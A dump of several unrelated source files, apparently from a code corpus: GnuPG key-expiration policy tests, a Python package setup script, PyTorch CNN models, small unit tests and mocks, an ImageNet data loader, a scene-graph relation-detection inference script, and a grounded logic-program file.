fpr:::::::::80DE955635C6D9BF397182E0B600D9C92333A0BD:
sub:-:4096:1:5C86C94E1054CF0D:1533247200:1564783200:::::e::::::23:
fpr:::::::::5CB0AB96CC27B81BC863A49A5C86C94E1054CF0D:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0C03DAC68D7CAAA4',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2018, 8, 23, 22, 0, 1),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='B600D9C92333A0BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='5C86C94E1054CF0D',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [],
'glep63-1-rsa2048-ec25519': [],
'glep63-1-strict': [],
'glep63-2': [
KeyWarning(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyWarning(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2.1': [
KeyWarning(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
}
class SubKeyThreeWeekExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/subkey-3w.gpg'
GPG_COLONS = '''
tru::1:1533247200:1564783200:3:1:5
pub:-:4096:1:0C03DAC68D7CAAA4:1533247200:1564783200::u:::cESC::::::23::0:
fpr:::::::::2CBB31F7106077B10497E2180C03DAC68D7CAAA4:
uid:-::::1533247200::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:B600D9C92333A0BD:1533247200:1535061601:::::s::::::23:
fpr:::::::::80DE955635C6D9BF397182E0B600D9C92333A0BD:
sub:-:4096:1:5C86C94E1054CF0D:1533247200:1535061601:::::e::::::23:
fpr:::::::::5CB0AB96CC27B81BC863A49A5C86C94E1054CF0D:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0C03DAC68D7CAAA4',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='B600D9C92333A0BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2018, 8, 23, 22, 0, 1),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='5C86C94E1054CF0D',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2018, 8, 23, 22, 0, 1),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [],
'glep63-1-rsa2048-ec25519': [],
'glep63-1-strict': [],
'glep63-2': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2-draft-20180707': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2.1': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[1],
machine_desc='expire:short',
long_desc='',
),
],
}
|
py | 1a37f1835eb0baa10aa3188d7a8848fc1d91510f | import setuptools
with open('README.md', 'r') as fh:
long_description = fh.read()
setuptools.setup(
name='pico_sdk',
version='0.1.4',
author='Meaty Solutions',
author_email='[email protected]',
description='High performance, gap-free streaming from any Pico Technology oscilloscope',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/meatysolutions/pico-sdk-bindings',
package_data={'': ['artifacts/*', 'artifacts/*/*']},
packages=setuptools.find_packages(),
install_requires=['numpy'],
classifiers=[
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
],
python_requires='>=3.6',
)
|
py | 1a37f18baa9025c9f62a64f4bd3224ae33f0e4d4 | import torch
import torch.nn as nn
def standardize(x, bn_stats):
if bn_stats is None:
return x
bn_mean, bn_var = bn_stats
view = [1] * len(x.shape)
view[1] = -1
x = (x - bn_mean.view(view)) / torch.sqrt(bn_var.view(view) + 1e-5)
# if variance is too low, just ignore
x *= (bn_var.view(view) != 0).float()
return x
def clip_data(data, max_norm):
norms = torch.norm(data.reshape(data.shape[0], -1), dim=-1)
scale = (max_norm / norms).clamp(max=1.0)
data *= scale.reshape(-1, 1, 1, 1)
return data
def get_num_params(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
class StandardizeLayer(nn.Module):
def __init__(self, bn_stats):
super(StandardizeLayer, self).__init__()
self.bn_stats = bn_stats
def forward(self, x):
return standardize(x, self.bn_stats)
class ClipLayer(nn.Module):
def __init__(self, max_norm):
super(ClipLayer, self).__init__()
self.max_norm = max_norm
def forward(self, x):
return clip_data(x, self.max_norm)
class CIFAR10_CNN(nn.Module):
def __init__(self, in_channels=3, input_norm=None, **kwargs):
super(CIFAR10_CNN, self).__init__()
self.in_channels = in_channels
self.features = None
self.classifier = None
self.norm = None
self.build(input_norm, **kwargs)
def build(self, input_norm=None, num_groups=None,
bn_stats=None, size=None):
if self.in_channels == 3:
if size == "small":
cfg = [16, 16, 'M', 32, 32, 'M', 64, 'M']
else:
cfg = [32, 32, 'M', 64, 64, 'M', 128, 128, 'M']
self.norm = nn.Identity()
else:
if size == "small":
cfg = [16, 16, 'M', 32, 32]
else:
cfg = [64, 'M', 64]
if input_norm is None:
self.norm = nn.Identity()
elif input_norm == "GroupNorm":
self.norm = nn.GroupNorm(num_groups, self.in_channels, affine=False)
else:
self.norm = lambda x: standardize(x, bn_stats)
layers = []
act = nn.Tanh
c = self.in_channels
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(c, v, kernel_size=3, stride=1, padding=1)
layers += [conv2d, act()]
c = v
self.features = nn.Sequential(*layers)
if self.in_channels == 3:
hidden = 128
self.classifier = nn.Sequential(nn.Linear(c * 4 * 4, hidden), act(), nn.Linear(hidden, 10))
else:
self.classifier = nn.Linear(c * 4 * 4, 10)
def forward(self, x):
if self.in_channels != 3:
x = self.norm(x.view(-1, self.in_channels, 8, 8))
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
class MNIST_CNN(nn.Module):
def __init__(self, in_channels=1, input_norm=None, **kwargs):
super(MNIST_CNN, self).__init__()
self.in_channels = in_channels
self.features = None
self.classifier = None
self.norm = None
self.build(input_norm, **kwargs)
def build(self, input_norm=None, num_groups=None,
bn_stats=None, size=None):
if self.in_channels == 1:
ch1, ch2 = (16, 32) if size is None else (32, 64)
cfg = [(ch1, 8, 2, 2), 'M', (ch2, 4, 2, 0), 'M']
self.norm = nn.Identity()
else:
ch1, ch2 = (16, 32) if size is None else (32, 64)
cfg = [(ch1, 3, 2, 1), (ch2, 3, 1, 1)]
if input_norm == "GroupNorm":
self.norm = nn.GroupNorm(num_groups, self.in_channels, affine=False)
elif input_norm == "BN":
self.norm = lambda x: standardize(x, bn_stats)
else:
self.norm = nn.Identity()
layers = []
c = self.in_channels
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=1)]
else:
filters, k_size, stride, pad = v
conv2d = nn.Conv2d(c, filters, kernel_size=k_size, stride=stride, padding=pad)
layers += [conv2d, nn.Tanh()]
c = filters
self.features = nn.Sequential(*layers)
hidden = 32
self.classifier = nn.Sequential(nn.Linear(c * 4 * 4, hidden),
nn.Tanh(),
nn.Linear(hidden, 10))
def forward(self, x):
if self.in_channels != 1:
x = self.norm(x.view(-1, self.in_channels, 7, 7))
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
class ScatterLinear(nn.Module):
def __init__(self, in_channels, hw_dims, input_norm=None, classes=10, clip_norm=None, **kwargs):
super(ScatterLinear, self).__init__()
self.K = in_channels
self.h = hw_dims[0]
self.w = hw_dims[1]
self.fc = None
self.norm = None
self.clip = None
self.build(input_norm, classes=classes, clip_norm=clip_norm, **kwargs)
def build(self, input_norm=None, num_groups=None, bn_stats=None, clip_norm=None, classes=10):
self.fc = nn.Linear(self.K * self.h * self.w, classes)
if input_norm is None:
self.norm = nn.Identity()
elif input_norm == "GroupNorm":
self.norm = nn.GroupNorm(num_groups, self.K, affine=False)
else:
self.norm = lambda x: standardize(x, bn_stats)
if clip_norm is None:
self.clip = nn.Identity()
else:
self.clip = ClipLayer(clip_norm)
def forward(self, x):
x = self.norm(x.view(-1, self.K, self.h, self.w))
x = self.clip(x)
x = x.reshape(x.size(0), -1)
x = self.fc(x)
return x
CNNS = {
"cifar10": CIFAR10_CNN,
"fmnist": MNIST_CNN,
"mnist": MNIST_CNN,
}
|
py | 1a37f20196433205d1377cce21427660caa6c75c | """
Tests for proposal related things
"""
import pytest
from ingest.process.proposals.connected_components import get_proposals
import io
import base64
from PIL import Image
def test_num_objs():
with open('/ingestion/tests/images/pages-43707.bytes', 'rb') as rf:
b = rf.read()
img = Image.open(io.BytesIO(b)).convert('RGB')
resize_bytes = io.BytesIO()
proposals = get_proposals(img)
num_objs = len(proposals)
assert num_objs < 10
with open('/ingestion/tests/images/pages-956.bytes', 'rb') as rf:
b = rf.read()
img = Image.open(io.BytesIO(b)).convert('RGB')
resize_bytes = io.BytesIO()
proposals = get_proposals(img)
num_objs = len(proposals)
assert num_objs < 10
def test_no_tiny_objs():
with open('/ingestion/tests/images/pages-43707.bytes', 'rb') as rf:
b = rf.read()
img = Image.open(io.BytesIO(b)).convert('RGB')
resize_bytes = io.BytesIO()
proposals = get_proposals(img)
num_objs = len(proposals)
for proposal in proposals:
w = proposal[2] - proposal[0]
h = proposal[3] - proposal[1]
print(proposals)
assert False #h >= 40 and w >= 50
|
py | 1a37f20c8a04df6d7e757f41e76e5ab1f327b260 | def test_factorial_digit_sum():
assert factorial_digit_sum(10) == 27
def factorial_digit_sum(n):
n_factorial_iterable = str(math.factorial(n))
digits_in_n_factorial = [int(i) for i in n_factorial_iterable]
return sum(digits_in_n_factorial)
|
py | 1a37f2bd5fe18531b4032a37a702ab6810656fed | """Provide mock structures used accross the tests."""
from typing import List, Union
class NumpyArray:
"""Represent a class that mocks a numpy.array and it's behavior on less-then operator."""
def __init__(self, values: List[Union[int, bool]]) -> None:
"""Initialize with the given values."""
self.values = values
def __lt__(self, other: int) -> 'NumpyArray':
"""Map the value to each comparison with ``other``."""
return NumpyArray(values=[value < other for value in self.values])
def __gt__(self, other: int) -> 'NumpyArray':
"""Map the value to each comparison with ``other``."""
return NumpyArray(values=[value > other for value in self.values])
def __bool__(self) -> bool:
"""Raise a ValueError."""
raise ValueError("The truth value of an array with more than one element is ambiguous.")
def all(self) -> bool:
"""Return True if all values are True."""
return all(self.values)
def __repr__(self) -> str:
"""Represent with the constructor."""
return 'NumpyArray({!r})'.format(self.values)
|
py | 1a37f2ca6575335359a6db14eabd26c706ce77b7 | # python3
# Copyright 2020 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""ImageNet dataset with typical pre-processing."""
import enum
from typing import Generator, Mapping, Optional, Sequence, Text, Tuple
import jax
import numpy as np
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
Batch = Mapping[Text, np.ndarray]
MEAN_RGB = (0.485 * 255, 0.456 * 255, 0.406 * 255)
STDDEV_RGB = (0.229 * 255, 0.224 * 255, 0.225 * 255)
class Split(enum.Enum):
"""Imagenet dataset split."""
TRAIN = 1
TRAIN_AND_VALID = 2
VALID = 3
TEST = 4
@classmethod
def from_string(cls, name: Text) -> 'Split':
return {'TRAIN': Split.TRAIN, 'TRAIN_AND_VALID': Split.TRAIN_AND_VALID,
'VALID': Split.VALID, 'VALIDATION': Split.VALID,
'TEST': Split.TEST}[name.upper()]
@property
def num_examples(self):
return {Split.TRAIN_AND_VALID: 1281167, Split.TRAIN: 1271167,
Split.VALID: 10000, Split.TEST: 50000}[self]
def load(
split: Split,
*,
is_training: bool,
batch_dims: Sequence[int],
bfloat16: bool = False,
) -> Generator[Batch, None, None]:
"""Loads the given split of the dataset."""
if is_training:
start, end = _shard(split, jax.host_id(), jax.host_count())
else:
start, end = _shard(split, 0, 1)
tfds_split = tfds.core.ReadInstruction(_to_tfds_split(split),
from_=start, to=end, unit='abs')
ds = tfds.load('imagenet2012:5.*.*', split=tfds_split,
decoders={'image': tfds.decode.SkipDecoding()})
total_batch_size = np.prod(batch_dims)
options = ds.options()
options.experimental_threading.private_threadpool_size = 48
options.experimental_threading.max_intra_op_parallelism = 1
if is_training:
options.experimental_deterministic = False
if is_training:
if jax.host_count() > 1:
# Only cache if we are reading a subset of the dataset.
ds = ds.cache()
ds = ds.repeat()
ds = ds.shuffle(buffer_size=10 * total_batch_size, seed=0)
else:
if split.num_examples % total_batch_size != 0:
raise ValueError(f'Test/valid must be divisible by {total_batch_size}')
def preprocess(example):
image = _preprocess_image(example['image'], is_training)
if bfloat16:
image = tf.cast(image, tf.bfloat16)
label = tf.cast(example['label'], tf.int32)
return {'images': image, 'labels': label}
ds = ds.map(preprocess, num_parallel_calls=tf.data.experimental.AUTOTUNE)
for batch_size in reversed(batch_dims):
ds = ds.batch(batch_size)
ds = ds.prefetch(tf.data.experimental.AUTOTUNE)
yield from tfds.as_numpy(ds)
def _to_tfds_split(split: Split) -> tfds.Split:
"""Returns the TFDS split appropriately sharded."""
# NOTE: Imagenet did not release labels for the test split used in the
# competition, so it has been typical at DeepMind to consider the VALID
# split the TEST split and to reserve 10k images from TRAIN for VALID.
if split in (Split.TRAIN, Split.TRAIN_AND_VALID, Split.VALID):
return tfds.Split.TRAIN
else:
assert split == Split.TEST
return tfds.Split.VALIDATION
def _shard(split: Split, shard_index: int, num_shards: int) -> Tuple[int, int]:
"""Returns [start, end) for the given shard index."""
assert shard_index < num_shards
arange = np.arange(split.num_examples)
shard_range = np.array_split(arange, num_shards)[shard_index]
start, end = shard_range[0], (shard_range[-1] + 1)
if split == Split.TRAIN:
# Note that our TRAIN=TFDS_TRAIN[10000:] and VALID=TFDS_TRAIN[:10000].
offset = Split.VALID.num_examples
start += offset
end += offset
return start, end
def _preprocess_image(
image_bytes: tf.Tensor,
is_training: bool,
) -> tf.Tensor:
"""Returns processed and resized images."""
if is_training:
image = _decode_and_random_crop(image_bytes)
image = tf.image.random_flip_left_right(image)
else:
image = _decode_and_center_crop(image_bytes)
assert image.dtype == tf.uint8
# NOTE: Bicubic resize (1) casts uint8 to float32 and (2) resizes without
# clamping overshoots. This means values returned will be outside the range
# [0.0, 255.0] (e.g. we have observed outputs in the range [-51.1, 336.6]).
image = tf.image.resize(image, [224, 224], tf.image.ResizeMethod.BICUBIC)
image = _normalize_image(image)
return image
def _normalize_image(image: tf.Tensor) -> tf.Tensor:
"""Normalize the image to zero mean and unit variance."""
image -= tf.constant(MEAN_RGB, shape=[1, 1, 3], dtype=image.dtype)
image /= tf.constant(STDDEV_RGB, shape=[1, 1, 3], dtype=image.dtype)
return image
def _distorted_bounding_box_crop(
image_bytes: tf.Tensor,
*,
jpeg_shape: tf.Tensor,
bbox: tf.Tensor,
min_object_covered: float,
aspect_ratio_range: Tuple[float, float],
area_range: Tuple[float, float],
max_attempts: int,
) -> tf.Tensor:
"""Generates cropped_image using one of the bboxes randomly distorted."""
bbox_begin, bbox_size, _ = tf.image.sample_distorted_bounding_box(
jpeg_shape,
bounding_boxes=bbox,
min_object_covered=min_object_covered,
aspect_ratio_range=aspect_ratio_range,
area_range=area_range,
max_attempts=max_attempts,
use_image_if_no_bounding_boxes=True)
# Crop the image to the specified bounding box.
offset_y, offset_x, _ = tf.unstack(bbox_begin)
target_height, target_width, _ = tf.unstack(bbox_size)
crop_window = tf.stack([offset_y, offset_x, target_height, target_width])
image = tf.image.decode_and_crop_jpeg(image_bytes, crop_window, channels=3)
return image
def _decode_and_random_crop(image_bytes: tf.Tensor) -> tf.Tensor:
"""Make a random crop of 224."""
jpeg_shape = tf.image.extract_jpeg_shape(image_bytes)
bbox = tf.constant([0.0, 0.0, 1.0, 1.0], dtype=tf.float32, shape=[1, 1, 4])
image = _distorted_bounding_box_crop(
image_bytes,
jpeg_shape=jpeg_shape,
bbox=bbox,
min_object_covered=0.1,
aspect_ratio_range=(3 / 4, 4 / 3),
area_range=(0.08, 1.0),
max_attempts=10)
if tf.reduce_all(tf.equal(jpeg_shape, tf.shape(image))):
# If the random crop failed fall back to center crop.
image = _decode_and_center_crop(image_bytes, jpeg_shape)
return image
def _decode_and_center_crop(
image_bytes: tf.Tensor,
jpeg_shape: Optional[tf.Tensor] = None,
) -> tf.Tensor:
"""Crops to center of image with padding then scales."""
if jpeg_shape is None:
jpeg_shape = tf.image.extract_jpeg_shape(image_bytes)
image_height = jpeg_shape[0]
image_width = jpeg_shape[1]
padded_center_crop_size = tf.cast(
((224 / (224 + 32)) *
tf.cast(tf.minimum(image_height, image_width), tf.float32)), tf.int32)
offset_height = ((image_height - padded_center_crop_size) + 1) // 2
offset_width = ((image_width - padded_center_crop_size) + 1) // 2
crop_window = tf.stack([offset_height, offset_width,
padded_center_crop_size, padded_center_crop_size])
image = tf.image.decode_and_crop_jpeg(image_bytes, crop_window, channels=3)
return image
|
py | 1a37f38252d2e5fc8f95826709a5740c12b529f9 | """Perform inference on one or more datasets."""
import argparse
import cv2
import os
import pprint
import sys
import time
from six.moves import cPickle as pickle
import torch
import _init_paths # pylint: disable=unused-import
from core.config import cfg, merge_cfg_from_file, merge_cfg_from_list, assert_and_infer_cfg
#from core.test_engine_rel import run_inference, get_features_for_centroids
import utils.logging
from datasets import task_evaluation_rel as task_evaluation
from evaluation.generate_detections_csv import generate_csv_file_from_det_obj, generate_topk_csv_from_det_obj, generate_boxes_csv_from_det_obj
from evaluation.frequency_based_analysis_of_methods import get_metrics_from_csv, get_many_medium_few_scores, get_wordsim_metrics_from_csv
import numpy as np
import json
# OpenCL may be enabled by default in OpenCV3; disable it because it's not
# thread safe and causes unwanted GPU memory allocations.
cv2.ocl.setUseOpenCL(False)
def parse_args():
"""Parse in command line arguments"""
parser = argparse.ArgumentParser(description='Test a Fast R-CNN network')
parser.add_argument(
'--dataset',
help='training dataset')
parser.add_argument(
'--cfg', dest='cfg_file', required=True,
help='optional config file')
parser.add_argument(
'--load_ckpt', help='path of checkpoint to load')
parser.add_argument(
'--load_detectron', help='path to the detectron weight pickle file')
parser.add_argument(
'--output_dir',
help='output directory to save the testing results. If not provided, '
'defaults to [args.load_ckpt|args.load_detectron]/../test.')
parser.add_argument(
'--set', dest='set_cfgs',
help='set config keys, will overwrite config in the cfg_file.'
' See lib/core/config.py for all options',
default=[], nargs='*')
parser.add_argument(
'--range',
help='start (inclusive) and end (exclusive) indices',
type=int, nargs=2)
parser.add_argument(
'--multi-gpu-testing', help='using multiple gpus for inference',
action='store_true')
parser.add_argument(
'--vis', dest='vis', help='visualize detections', action='store_true')
parser.add_argument(
'--do_val', dest='do_val', help='do evaluation', action='store_true')
parser.add_argument(
'--use_gt_boxes', dest='use_gt_boxes', help='use gt boxes for sgcls/prdcls', action='store_true')
parser.add_argument(
'--use_gt_labels', dest='use_gt_labels', help='use gt boxes for sgcls/prdcls', action='store_true')
parser.add_argument(
'--cutoff_medium', dest='cutoff_medium', help='ratio of medium classes', type=float, default=0.80)
parser.add_argument(
'--cutoff_many', dest='cutoff_many', help='ratio of many classes', type=float, default=0.95)
parser.add_argument(
'--seed', dest='seed',
help='Value of seed here will overwrite seed in cfg file',
type=int)
return parser.parse_args()
def get_obj_and_prd_categories():
from datasets.dataset_catalog_rel import ANN_FN3
from datasets.dataset_catalog_rel import DATASETS
predicates_path = DATASETS[cfg.TEST.DATASETS[0]][ANN_FN3]
objects_path = DATASETS[cfg.TEST.DATASETS[0]][ANN_FN3].replace('predicates', 'objects', 1)
logger.info('Loading predicates from: ' + predicates_path)
logger.info('Loading objects from: ' + objects_path)
with open(predicates_path) as f:
prd_categories = json.load(f)
with open(objects_path) as f:
obj_categories = json.load(f)
return obj_categories, prd_categories
def get_obj_and_prd_frequencies():
if cfg.DATASET == 'gvqa10k':
freq_prd_path = cfg.DATA_DIR + '/gvqa/reduced_data/10k/seed{}/predicates_freqs.json'.format(
cfg.RNG_SEED)
freq_obj_path = cfg.DATA_DIR + '/gvqa/reduced_data/10k/seed{}/objects_freqs.json'.format(
cfg.RNG_SEED)
elif cfg.DATASET == 'gvqa20k':
freq_prd_path = cfg.DATA_DIR + '/gvqa/reduced_data/20k/seed{}/predicates_freqs.json'.format(
cfg.RNG_SEED)
freq_obj_path = cfg.DATA_DIR + '/gvqa/reduced_data/20k/seed{}/objects_freqs.json'.format(
cfg.RNG_SEED)
elif cfg.DATASET == 'gvqa':
freq_prd_path = cfg.DATA_DIR + '/gvqa/seed{}/predicates_freqs.json'.format(
cfg.RNG_SEED)
freq_obj_path = cfg.DATA_DIR + '/gvqa/seed{}/objects_freqs.json'.format(
cfg.RNG_SEED)
elif cfg.DATASET == 'vg80k':
freq_prd_path = cfg.DATA_DIR + '/vg/predicates_freqs.json'
freq_obj_path = cfg.DATA_DIR + '/vg/objects_freqs.json'
elif cfg.DATASET == 'vg8k':
freq_prd_path = cfg.DATA_DIR + '/vg8k/seed{}/train_predicates_freqs.json'.format(
cfg.RNG_SEED)
freq_obj_path = cfg.DATA_DIR + '/vg8k/seed{}/train_objects_freqs.json'.format(
cfg.RNG_SEED)
else:
raise NotImplementedError
logger.info('Loading predicates frequencies from: ' + freq_prd_path)
logger.info('Loading objects frequencies from: ' + freq_obj_path)
prd_freq_dict = json.load(open(freq_prd_path))
obj_freq_dict = json.load(open(freq_obj_path))
return obj_freq_dict, prd_freq_dict
if __name__ == '__main__':
logger = utils.logging.setup_logging(__name__)
args = parse_args()
logger.info('Called with args:')
logger.info(args)
cfg.VIS = args.vis
if args.cfg_file is not None:
merge_cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
merge_cfg_from_list(args.set_cfgs)
cfg.DATASET = args.dataset
if args.dataset == "vrd":
cfg.TEST.DATASETS = ('vrd_val',)
cfg.MODEL.NUM_CLASSES = 101
cfg.MODEL.NUM_PRD_CLASSES = 70 # exclude background
elif args.dataset == "vg":
cfg.TEST.DATASETS = ('vg_val',)
cfg.MODEL.NUM_CLASSES = 151
cfg.MODEL.NUM_PRD_CLASSES = 50 # exclude background
elif args.dataset == "vg80k":
cfg.TEST.DATASETS = ('vg80k_test',)
cfg.MODEL.NUM_CLASSES = 53305 # includes background
cfg.MODEL.NUM_PRD_CLASSES = 29086 # excludes background
elif args.dataset == "vg8k":
cfg.TEST.DATASETS = ('vg8k_test',)
cfg.MODEL.NUM_CLASSES = 5331 # includes background
cfg.MODEL.NUM_PRD_CLASSES = 2000 # excludes background
elif args.dataset == "gvqa20k":
cfg.TEST.DATASETS = ('gvqa20k_test',)
cfg.MODEL.NUM_CLASSES = 1704 # includes background
cfg.MODEL.NUM_PRD_CLASSES = 310 # exclude background
elif args.dataset == "gvqa10k":
cfg.TEST.DATASETS = ('gvqa10k_test',)
cfg.MODEL.NUM_CLASSES = 1704 # includes background
cfg.MODEL.NUM_PRD_CLASSES = 310 # exclude background
elif args.dataset == "gvqa":
cfg.TEST.DATASETS = ('gvqa_test',)
cfg.MODEL.NUM_CLASSES = 1704 # includes background
cfg.MODEL.NUM_PRD_CLASSES = 310 # exclude background
else: # For subprocess call
assert cfg.TEST.DATASETS, 'cfg.TEST.DATASETS shouldn\'t be empty'
if args.seed:
cfg.RNG_SEED = args.seed
assert_and_infer_cfg()
data_dir = '{}/{}/'.format(cfg.DATA_DIR, cfg.DATASET)
ann_dir = '{}seed{}/'.format(data_dir, cfg.RNG_SEED)
# The import has to happen after setting up the config to avoid loading default cfg values
from core.test_engine_rel import run_inference
obj_categories, prd_categories = get_obj_and_prd_categories()
obj_freq_dict, prd_freq_dict = get_obj_and_prd_frequencies()
if not cfg.MODEL.RUN_BASELINE:
assert bool(args.load_ckpt) ^ bool(args.load_detectron), \
'Exactly one of --load_ckpt and --load_detectron should be specified.'
if args.output_dir is None:
ckpt_path = args.load_ckpt if args.load_ckpt else args.load_detectron
args.output_dir = os.path.join(
os.path.dirname(os.path.dirname(ckpt_path)), 'test')
logger.info('Automatically set output directory to %s', args.output_dir)
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
logger.info('Testing with config:')
logger.info(pprint.pformat(cfg))
# For test_engine.multi_gpu_test_net_on_dataset
args.test_net_file, _ = os.path.splitext(__file__)
# manually set args.cuda
args.cuda = True
#print('Generating Centroids')
#all_results = get_features_for_centroids(args)
#print('Done!')
if args.use_gt_boxes:
if args.use_gt_labels:
det_file = os.path.join(args.output_dir, 'rel_detections_gt_boxes_prdcls.pkl')
csv_file = os.path.join(args.output_dir, 'rel_detections_gt_boxes_prdcls.csv')
else:
det_file = os.path.join(args.output_dir, 'rel_detections_gt_boxes_sgcls.pkl')
csv_file = os.path.join(args.output_dir, 'rel_detections_gt_boxes_sgcls.csv')
else:
det_file = os.path.join(args.output_dir, 'rel_detections.pkl')
csv_file = os.path.join(args.output_dir, 'rel_detections.csv')
if os.path.exists(det_file):
logger.info('Loading results from {}'.format(det_file))
with open(det_file, 'rb') as f:
all_results = pickle.load(f)
# logger.info('Starting evaluation now...')
# task_evaluation.eval_rel_results(all_results, args.output_dir, args.do_val)
else:
if not torch.cuda.is_available():
sys.exit("Need a CUDA device to run the code.")
assert (torch.cuda.device_count() == 1) ^ bool(args.multi_gpu_testing)
all_results = run_inference(
args,
ind_range=args.range,
multi_gpu_testing=args.multi_gpu_testing,
check_expected_results=True)
all_results = all_results[0]
print('all_results', len(all_results))
print('all_results', all_results[0].keys())
#all_results = all_results[0]
freq_prd = (np.zeros(cfg.MODEL.NUM_PRD_CLASSES))
freq_obj = (np.zeros(cfg.MODEL.NUM_CLASSES))
generate_csv_file_from_det_obj(all_results, csv_file, obj_categories, prd_categories, obj_freq_dict, prd_freq_dict)
logger.info('Saved CSV to: ' + csv_file)
get_metrics_from_csv(csv_file, get_mr=True)
cutoffs = [args.cutoff_medium, args.cutoff_many]
get_many_medium_few_scores(csv_file, cutoffs, cfg.DATASET, data_dir, ann_dir, syn=True)
csv_file_topk = os.path.join(os.path.dirname(csv_file), 'rel_detections_gt_boxes_prdcls_topk.csv')
generate_topk_csv_from_det_obj(all_results, csv_file_topk, obj_categories, prd_categories, 250)
logger.info('Saved topk CSV to: ' + csv_file_topk)
csv_file_boxes = os.path.join(os.path.dirname(csv_file), 'rel_detections_gt_boxes_prdcls_boxes.csv')
generate_boxes_csv_from_det_obj(all_results, csv_file_boxes, obj_categories, prd_categories, obj_freq_dict, prd_freq_dict)
logger.info('Saved boxes CSV to: ' + csv_file_boxes)
if cfg.DATASET.find('gvqa') >= 0:
from evaluation.add_word_similarity_to_csv import add_similarity_to_detections
logger.info('Adding word similarity to CSV')
add_similarity_to_detections(csv_file)
csv_file_w = os.path.join(os.path.dirname(csv_file), 'rel_detections_gt_boxes_prdcls_wrd_sim.csv')
get_wordsim_metrics_from_csv(csv_file_w)
|
py | 1a37f41782ff501211e43e37001075e56170824e | input = """
1 2 0 0
1 3 0 0
1 4 0 0
1 5 0 0
1 6 0 0
1 7 0 0
1 8 0 0
1 9 0 0
1 10 0 0
1 11 0 0
1 12 2 1 13 14
1 13 2 1 12 14
1 14 0 0
1 15 2 1 16 17
1 16 2 1 15 17
1 17 0 0
1 18 2 1 19 20
1 19 2 1 18 20
1 20 0 0
1 21 2 1 22 23
1 22 2 1 21 23
1 23 0 0
1 24 2 1 25 26
1 25 2 1 24 26
1 26 0 0
1 27 2 1 28 29
1 28 2 1 27 29
1 29 0 0
1 30 2 1 31 32
1 31 2 1 30 32
1 32 0 0
1 33 2 1 34 35
1 34 2 1 33 35
1 35 0 0
1 36 2 1 37 38
1 37 2 1 36 38
1 38 0 0
1 39 2 1 40 41
1 40 2 1 39 41
1 41 0 0
2 42 10 0 5 39 36 33 30 27 24 21 18 15 12
1 1 1 1 42
2 43 10 0 5 40 37 34 31 28 25 22 19 16 13
1 1 1 1 43
0
12 a(10)
15 a(9)
18 a(8)
21 a(7)
24 a(6)
27 a(5)
30 a(4)
33 a(3)
36 a(2)
39 a(1)
13 b(10)
